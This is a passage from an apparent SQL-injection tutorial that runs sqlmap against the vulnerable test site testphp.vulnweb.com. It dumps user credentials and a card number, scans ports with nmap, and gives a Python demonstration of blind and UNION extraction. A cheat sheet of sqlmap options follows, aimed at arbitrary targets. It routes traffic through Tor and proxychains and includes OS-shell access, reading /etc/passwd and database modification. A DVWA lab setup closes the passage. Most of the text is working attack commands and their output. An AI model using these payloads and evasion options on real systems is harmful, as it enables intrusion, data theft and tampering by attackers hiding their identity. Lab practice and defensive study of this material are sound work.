| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

Database: acuart
Table: carts

[3 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| cart_id | varchar(100) |
| item    | int(11)      |
| price   | int(11)      |
+---------+--------------+

Database: acuart
Table: pictures

[8 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| a_id   | int(11)      |
| cat_id | int(11)      |
| img    | varchar(50)  |
| pic_id | int(5)       |
| plong  | text         |
| price  | int(11)      |
| pshort | mediumtext   |
| title  | varchar(100) |
+--------+--------------+

Database: acuart
Table: featured

[2 columns]
+--------------+---------+
| Column       | Type    |
+--------------+---------+
| feature_text | text    |
| pic_id       | int(11) |
+--------------+---------+

Database: acuart
Table: products

[5 columns]
+-------------+------------------+
| Column      | Type             |
+-------------+------------------+
| description | text             |
| id          | int(10) unsigned |
| name        | text             |
| price       | int(10) unsigned |
| rewritename | text             |
+-------------+------------------+

Database: acuart
Table: artists

[3 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| adesc     | text        |
| aname     | varchar(50) |
| artist_id | int(5)      |
+-----------+-------------+

Database: acuart
Table: guestbook

[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| mesaj    | text         |
| sender   | varchar(150) |
| senttime | int(32)      |
+----------+--------------+

[22:15:27] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 22:15:27



----------------------------------------------


Listing the contents of the two columns uname and pass ( username and password )  :)

-D acuart      = database

-T users       = table ( of users )

-C uname,pass  = lists the 2 columns ( username and password )

--dump         = dumps the data



----------------------------------------------


Type the command below as a single line.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1"
                                              -D acuart -T users -C uname,pass --dump
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601040a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program

[*] starting at 22:26:26

[22:26:26] [INFO] resuming back-end DBMS 'mysql'
[22:26:26] [INFO] testing connection to the target URL
[22:26:27] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5701=5701

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[22:26:27] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[22:26:27] [INFO] fetching entries of column(s) 'pass, uname' for table 'users'
in database 'acuart'
[22:26:27] [INFO] the SQL query used returns 1 entries
[22:26:27] [INFO] retrieved: "test","test"
[22:26:27] [INFO] analyzing table dump for possible password hashes

Database: acuart
Table: users

[1 entry]
+-------+------+
| uname | pass |
+-------+------+
| test  | test |
+-------+------+

[22:26:27] [INFO] table 'acuart.users' dumped to CSV file
                    '/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[22:26:27] [INFO] fetched data logged to text files under
                    '/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 22:26:27


----------------------------------------------


See above the username and the super-secret password, stored in plain text... :)

A real application should store a salted, slow hash of the password (bcrypt, scrypt
or Argon2) rather than the password itself; the "analyzing table dump for possible
password hashes" line above is sqlmap checking for exactly that, and when it does find
hashes it offers to crack them with a wordlist.


Below we test the login on the site...





Accessing the data...




----------------------------------------------


sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-user
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601040a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program

[*] starting at 22:43:27

[22:43:27] [INFO] resuming back-end DBMS 'mysql'
[22:43:27] [INFO] testing connection to the target URL
[22:43:28] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5701=5701

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[22:43:28] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[22:43:28] [INFO] fetching current user
current user:    'acuart@localhost'
[22:43:28] [INFO] fetched data logged to text files under
  '/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 22:43:28



----------------------------------------------



sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --users
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601040a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program

[*] starting at 22:45:09

[22:45:10] [INFO] resuming back-end DBMS 'mysql'
[22:45:10] [INFO] testing connection to the target URL
[22:45:10] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5701=5701

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[22:45:11] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[22:45:11] [INFO] fetching database users
[22:45:11] [INFO] the SQL query used returns 1 entries
[22:45:11] [INFO] retrieved: 'acuart'@'localhost'
database management system users [1]:
[*] 'acuart'@'localhost'

[22:45:11] [INFO] fetched data logged to text files under
                  '/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 22:45:11


----------------------------------------------


Checking open ports ( -sS SYN scan, -P0 is the old spelling of -Pn and skips host
discovery, -sV probes service versions, -O attempts OS detection ).


nmap -sS -P0 -sV -O testphp.vulnweb.com

Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-06-12 22:57 EDT
Nmap scan report for testphp.vulnweb.com (176.28.50.165)
Host is up (0.25s latency).
rDNS record for 176.28.50.165: rs202995.rs.hosteurope.de
Not shown: 985 closed ports

PORT     STATE    SERVICE      VERSION

21/tcp   open     ftp          ProFTPD 1.3.3e
22/tcp   open     ssh          OpenSSH 5.3p1 Debian 3ubuntu7.1 (Ubuntu Linux; protocol 2.0)
25/tcp   open     smtp         Postfix smtpd
53/tcp   open     domain       ISC BIND none
80/tcp   open     http         nginx 1.4.1
106/tcp  open     pop3pw       poppassd
110/tcp  open     pop3         Courier pop3d
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
143/tcp  open     imap         Plesk Courier imapd
445/tcp  filtered microsoft-ds
465/tcp  open     ssl/smtp     Postfix smtpd
993/tcp  open     ssl/imap     Plesk Courier imapd
995/tcp  open     ssl/pop3     Courier pop3d
8443/tcp open     http         lighttpd

Aggressive OS guesses: Linux 2.6.32 (89%), QNAP NAS Firmware 3.8.3 (Linux 3.X) (87%),
IPFire firewall 2.11 (Linux 2.6.32) (87%), D-Link DSL-2890AL ADSL router (87%),
IPCop 1.9.19 or IPFire firewall 2.9 (Linux 2.6.32) (87%), OpenWrt Kamikaze 8.09
(Linux 2.6.25.20) (87%), Linux 2.6.36 (87%), Linux 3.2.1 (86%), Linux 2.6.35 (86%),
Check Point ZoneAlarm Z100G firewall (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Hosts:  rs202995.rs.hosteurope.de, localhost.localdomain; OSs: Unix,
Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.11 seconds


----------------------------------------------


*** Type the command below as a single line:

A note on the options: --tor-type and --tor-port only take effect together with
--tor; without it sqlmap connects directly, which is why the output below shows no
Tor connection check. --random-agent picks a User-Agent from sqlmap's own list (the
first log line shows it being fetched), so if you want the fixed User-Agent given in
--headers, drop --random-agent instead of combining both. --technique=BEUS restricts
the tests to boolean-based, error-based, UNION and stacked-query techniques, and
--time-sec=3 sets the delay used by time-based checks.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1"
          --dbs --time-sec=3 --threads=3 --technique=BEUS --random-agent --no-cast
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0)
Gecko/20100101 Firefox/25.0" --tor-type=SOCKS5 --tor-port 9050
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201603300a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program

[*] starting at 12:15:09

[12:15:09] [INFO] fetched random HTTP User-Agent header from file
'/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0
(Windows; U; Windows NT 6.1; en-US) AppleWebKit/525.19
(KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19'
[12:15:09] [INFO] testing connection to the target URL
[12:15:14] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[12:15:14] [INFO] testing if the target URL is stable
[12:15:15] [INFO] target URL is stable
[12:15:15] [INFO] testing if GET parameter 'artist' is dynamic
[12:15:15] [INFO] confirming that GET parameter 'artist' is dynamic
[12:15:15] [INFO] GET parameter 'artist' is dynamic
[12:15:15] [INFO] heuristic (basic) test shows that GET parameter 'artist' might be
injectable (possible DBMS: 'MySQL')
[12:15:16] [INFO] testing for SQL injection on GET parameter 'artist'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific
for other DBMSes? [Y/n]  y 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided
level (1) and risk (1) values? [Y/n]  y 
[12:15:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:15:20] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind - WHERE
or HAVING clause' injectable
[12:15:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause'
[12:15:21] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause'
[12:15:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (EXTRACTVALUE)'
[12:15:21] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (EXTRACTVALUE)'
[12:15:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (UPDATEXML)'
[12:15:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (UPDATEXML)'
[12:15:22] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (EXP)'
[12:15:22] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
[12:15:22] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (BIGINT UNSIGNED)'
[12:15:23] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause
(BIGINT UNSIGNED)'
[12:15:23] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause'
[12:15:23] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[12:15:23] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[12:15:24] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[12:15:24] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[12:15:25] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[12:15:25] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[12:15:25] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[12:15:25] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[12:15:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[12:15:26] [WARNING] time-based comparison requires larger statistical model, please wait.
[12:15:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[12:15:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[12:15:27] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[12:15:27] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[12:15:27] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[12:15:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:15:27] [INFO] automatically extending ranges for UNION query injection technique
tests as there is at least one other (potential) technique found
[12:15:28] [INFO] ORDER BY technique seems to be usable. This should reduce the time
needed to find the right number of query columns. Automatically extending the range
for current UNION query injection technique test
[12:15:29] [INFO] target URL appears to have 3 columns in query
[12:15:31] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) -
1 to 20 columns' injectable
GET parameter 'artist' is vulnerable. Do you want to keep testing the others
(if any)? [y/N]  n 
sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5619=5619

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-8736 UNION ALL SELECT CONCAT(0x7170716a71,
0x4973546243766278496f444b6b44654762736b496c61444a6c68577a61714c68665071516f6b7469,
0x716b717871),NULL,NULL-- -
---
[12:16:02] [INFO] testing MySQL
[12:16:02] [INFO] confirming MySQL
[12:16:03] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0
[12:16:03] [INFO] fetching database names
[12:16:03] [INFO] the SQL query used returns 2 entries
[12:16:03] [INFO] starting 2 threads
[12:16:03] [INFO] retrieved: acuart
[12:16:03] [INFO] retrieved: information_schema
available databases [2]:
[*] acuart
[*] information_schema

[12:16:03] [INFO] fetched data logged to text files under
  '/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 12:16:03


----------------------------------------------


*** Type the command below on a single line:

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1"
--current-user --is-dba --current-db --hostname --time-sec=3 --threads=3
--technique=BEUS --random-agent
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201603300a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent
is illegal. It is the end user's responsibility to obey all applicable local, state and
federal laws. Developers assume no liability and are not responsible for any misuse or
damage caused by this program

[*] starting at 12:29:55

[12:29:55] [INFO] fetched random HTTP User-Agent header from file
'/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9)
Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9'
[12:29:55] [INFO] resuming back-end DBMS 'mysql'
[12:29:55] [INFO] testing connection to the target URL
[12:29:56] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5619=5619

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-8736 UNION ALL SELECT CONCAT(0x7170716a71,
0x4973546243766278496f444b6b44654762736b496c61444a6c68577a61714c68665071516f6b7469,
0x716b717871),NULL,NULL-- -
---
[12:29:56] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5
[12:29:56] [INFO] fetching current user
current user:    'acuart@localhost'
[12:29:56] [INFO] fetching current database
current database:    'acuart'
[12:29:56] [INFO] fetching server hostname
hostname:    'rs202995'
[12:29:57] [INFO] testing if current user is DBA
[12:29:57] [INFO] fetching current user
[12:29:57] [WARNING] in case of continuous data retrieval problems you are advised to
try a switch '--no-cast' or switch '--hex'
current user is DBA:    False
[12:29:57] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 12:29:57


----------------------------------------------

Extracting the contents of the fields:

Type the command below on a single line:

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=2"
           -D acuart -T users -C uname,pass,cc,name --dump  --time-sec=3
           --threads=3 --technique=BEUS --random-agent
           --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0)
Gecko/20100101 Firefox/25.0" --tor-type=SOCKS5 --tor-port 9050
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201603300a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent
is illegal. It is the end user's responsibility to obey all applicable local, state
and federal laws. Developers assume no liability and are not responsible for any misuse
or damage caused by this program

[*] starting at 13:33:01

[13:33:01] [INFO] fetched random HTTP User-Agent header from file
'/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE}
(Macintosh; I; PPC)'
[13:33:02] [INFO] resuming back-end DBMS 'mysql'
[13:33:02] [INFO] testing connection to the target URL
[13:33:02] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=2 AND 4071=4071

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9556 UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7871,
0x554a4f78466953624f7376665a524e7a4c5867666476706566546a49634e6f545a76784d6c4a5745,
0x716b706a71)--
---
[13:33:02] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[13:33:02] [INFO] fetching entries of column(s) 'cc, name, pass, uname'
for table 'users' in database 'acuart'
[13:33:02] [INFO] the SQL query used returns 1 entries
[13:33:02] [INFO] resumed: "1234-5678-2300-9000","teste","test","test"
[13:33:02] [INFO] analyzing table dump for possible password hashes

Database: acuart
Table: users
[1 entry]
+-------+------+---------------------+-------+
| uname | pass | cc                  | name  |
+-------+------+---------------------+-------+
| test  | test | 1234-5678-2300-9000 | teste |
+-------+------+---------------------+-------+

[13:33:02] [INFO] table 'acuart.users' dumped to CSV file
'/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'

[13:33:02] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 13:33:02
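What the two injection points sqlmap reported above actually do, as an added example (not from the original page, and not sqlmap's own code): a Python script that builds an in-memory SQLite stand-in for the 'acuart' database, shows the vulnerable artists.php query pattern next to a parameterized one, and pulls the users row with the same boolean-based blind and UNION techniques. The artists table layout, the rows and the marker strings are assumptions for illustration; SQLite uses `||` and quoted strings where MySQL used CONCAT() and the 0x7170716a71 / 0x716b717871 hex literals, but the mechanics are identical.

```python
"""Added example: boolean-based blind and UNION extraction, as reported
by sqlmap above, reproduced offline against an in-memory SQLite stand-in
for the 'acuart' database. Schema and rows are constructed here."""
import sqlite3


def build_db():
    """Constructed stand-in for the remote database (assumption: the real
    artists table is not shown on the page; three columns are used because
    sqlmap found 3 columns in the query)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE artists(artist_id INTEGER, aname TEXT, adesc TEXT);
        INSERT INTO artists VALUES (1, 'r4w8173', 'bio one');
        INSERT INTO artists VALUES (2, 'Blad3', 'bio two');
        CREATE TABLE users(uname TEXT, pass TEXT, cc TEXT, name TEXT);
        INSERT INTO users VALUES ('test', 'test', '1234-5678-2300-9000', 'teste');
    """)
    return db


def vulnerable_lookup(db, artist):
    """The pattern behind artists.php?artist=N: the parameter is pasted
    into the SQL text, so whoever controls it controls the WHERE clause."""
    sql = "SELECT artist_id, aname, adesc FROM artists WHERE artist_id=" + artist
    return db.execute(sql).fetchall()


def safe_lookup(db, artist):
    """Hardened form: the value is bound as an integer and can never
    become part of the SQL text (ValueError for 'artist=1 AND 1=1')."""
    sql = "SELECT artist_id, aname, adesc FROM artists WHERE artist_id=?"
    return db.execute(sql, (int(artist),)).fetchall()


def blind_true(db, condition):
    """One bit per request: 'artist=1 AND <cond>' returns the row only
    when <cond> holds (sqlmap's 'artist=1 AND 5619=5619' probe)."""
    return bool(vulnerable_lookup(db, "1 AND " + condition))


def blind_length(db, subquery, max_len=64):
    """Find the length of a value first, so extraction knows when to stop."""
    for n in range(0, max_len + 1):
        if blind_true(db, "length((%s))=%d" % (subquery, n)):
            return n
    return None


def blind_extract(db, subquery):
    """Read a value one character at a time using only true/false answers."""
    n = blind_length(db, subquery)
    out = ""
    for pos in range(1, (n or 0) + 1):
        for code in range(32, 127):
            if blind_true(db, "unicode(substr((%s),%d,1))=%d" % (subquery, pos, code)):
                out += chr(code)
                break
    return out


def union_extract(db, expr):
    """UNION technique: an id that matches nothing (-8736) empties the real
    result, and the appended SELECT carries the attacker's value. The
    value is wrapped in marker strings so it can be located in the page;
    sqlmap does the same with random markers sent as hex literals."""
    left, right = "qpqjq", "qkqxq"
    payload = "-8736 UNION ALL SELECT '%s'||(%s)||'%s',NULL,NULL-- -" % (left, expr, right)
    for row in vulnerable_lookup(db, payload):
        cell = str(row[0])
        if cell.startswith(left) and cell.endswith(right):
            return cell[len(left):-len(right)]
    return None


def demo():
    """Dump the users row the way the --dump run above did, both ways."""
    db = build_db()
    password = blind_extract(db, "SELECT pass FROM users LIMIT 1")
    cc = union_extract(db, "SELECT cc FROM users LIMIT 1")
    return password, cc


if __name__ == "__main__":
    print(demo())  # ('test', '1234-5678-2300-9000')
```

The blind path needs roughly one request per candidate character (sqlmap narrows that with a bisection over the character range), which is why sqlmap prefers the UNION channel once it finds one: a single request returns the whole value.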

10 - Some more SqlMap Parameters



Type the line below as a single line:

proxychains sqlmap -u "vul_url" --dbs --time-sec=3 --threads=3 --technique=BEUS
--random-agent
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" 
--tor-type=SOCKS5 --tor-port 9050

----------------------------------------------

Type the line below as a single line:


proxychains sqlmap -u "vul_url" --dbs --time-sec=3 --threads=3 --technique=BEUS
--random-agent --no-cast
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050

----------------------------------------------

Type the line below as a single line:

proxychains sqlmap -u "vul_url" --current-user --is-dba --current-db --hostname
--time-sec=3 --threads=3 --technique=BEUS --random-agent
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050

----------------------------------------------

proxychains sqlmap -u "vul_url" --dbms=mysql -D data_base -T table --dump -C login,senha

----------------------------------------------

--level=3 --risk=3  --retries=3 --flush-session --hex --no-cast --batch --banner

--current-user --is-dba --current-db --hostname

--current-user --is-dba --parse-errors -v 3  ( show errors, messages )

--batch --tables --columns -T password --threads=8

--batch --dump -T password -C admin,pass --threads=8 --fresh-queries

--batch --banner --current-user --current-db

--users --current-db --dbs --exclude-sysdbs --tables --columns --flush-session --batch

--level=3 --risk=3 --forms --batch --banner --flush-session

--level=3 --risk=3 --forms --batch --banner --flush-session -p referer

--level=3 --risk=3 --flush-session --technique=B --batch


----------------------------------------------

--technique=BEUST -s /tmp/scan_report.txt --flush-session -t /tmp/scan_trace.txt
--fresh-queries > /root/scan_out.txt   ( -s session file, -t log of all HTTP traffic )

----------------------------------------------

--data="$(cat payload)" --prefix="1',1;" --suffix="-" --dns-domain=acme.com --os-shell
--fresh-queries --retries=5
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"

----------------------------------------------

--dbms=mysql --level=3 --risk=3 --time-sec=3 --threads=3 --technique=BEUS --random-agent
--no-cast
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050 --tamper="between,randomcase,space2comment"
--data "login#2*&senha=123#1*" --alert --crawl=CRAWLDEPTH --regexp --string
--text-only --cookie "security=low; PHPSESSID=daa2374033f2a5fa6b57d9cc22692301"
( --alert, --crawl, --regexp and --string each take an argument; CRAWLDEPTH is a placeholder )

----------------------------------------------

--batch --file-read="/etc/passwd"

--batch --forms --flush-session --delay=5 --tech=T --hex --crawl=3

--sql-query "SELECT * FROM users"

--sql-query="SELECT user,pass FROM usuarios WHERE user LIKE '%admin%'"

--sql-query "UPDATE databaseX.admin SET user='jura' WHERE username='aris'" -v 2

--sql-query="select * from transactions.sample_tran_table"

--users --passwords --privileges --roles --threads=10

--forms --batch --crawl=10 --cookie=jsessionid=12345 --level=5 --risk=3

--dbms="Microsoft Access"

--dbms="Microsoft SQL Server"

--dbms="PostgreSQL"

----------------------------------------------

--data "username=login#2*&senha=123#1*" --dbms=mysql --alert
--crawl=CRAWLDEPTH --level=5 --regexp --string --text-only

----------------------------------------------

--time-sec=7 --threads=3 --technique=BEUS --random-agent
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050

*** #2* and #1* mark the POST fields that must be injected (custom injection marks: sqlmap tests only the positions you mark)

----------------------------------------------

proxychains sqlmap -u "vul_url/index.php?page=login.php" --method "POST" --data
"user_name=admin&password=adminpass&Submit_button=Submit"

----------------------------------------------

-D mysql --sql-query="select usuario, senha from mysql.usuarios order by usuario desc"

-D mysql --sql-query="select column_name from information_schema.columns where
table_name = 'usuarios'"

----------------------------------------------

11 - Setting up dvwa lab

Installing the DVWA lab


In Kali, open Firefox and go to the URL -> www.dvwa.co.uk

Click the "download" button; the file "DVWA-master.zip" is saved in the "Downloads" folder


 cd Downloads 

 unzip DVWA-master.zip 

 mv DVWA-master /var/www/html/dvwa 

 cd /var/www/html 

 chmod -R 755 dvwa 

 cd dvwa/config 

 cp config.inc.php.dist config.inc.php 

-----------------------------

Change the lines below...

 nano /var/www/html/dvwa/config/config.inc.php 


$DBMS = 'MySQL';

# Set the lines below as follows (db_password must match the MySQL root
# password you use for "mysql -u root -p"; leave it empty only if root has no password):

$_DVWA = array();
$_DVWA[ 'db_server' ]   = '127.0.0.1';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ]     = 'root';
$_DVWA[ 'db_password' ] = '';

$_DVWA[ 'recaptcha_public_key' ]  = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';

$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';

-----------------------------

 mysql -u root -p 

 create database dvwa; 

 quit 

-----------------------------

 chmod -R 777 /var/www/html/dvwa/hackable/uploads/ 

 chmod -R 777 /var/www/html/dvwa/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt 

( world-writable paths are acceptable on an isolated lab VM only; keep DVWA off any network you care about )

-----------------------------

 nano /etc/php/7.0/apache2/php.ini 

allow_url_include = on

-----------------------------

 service apache2 start 

 service mysql start 

 service mysql status 

 service apache2 status 

-----------------------------

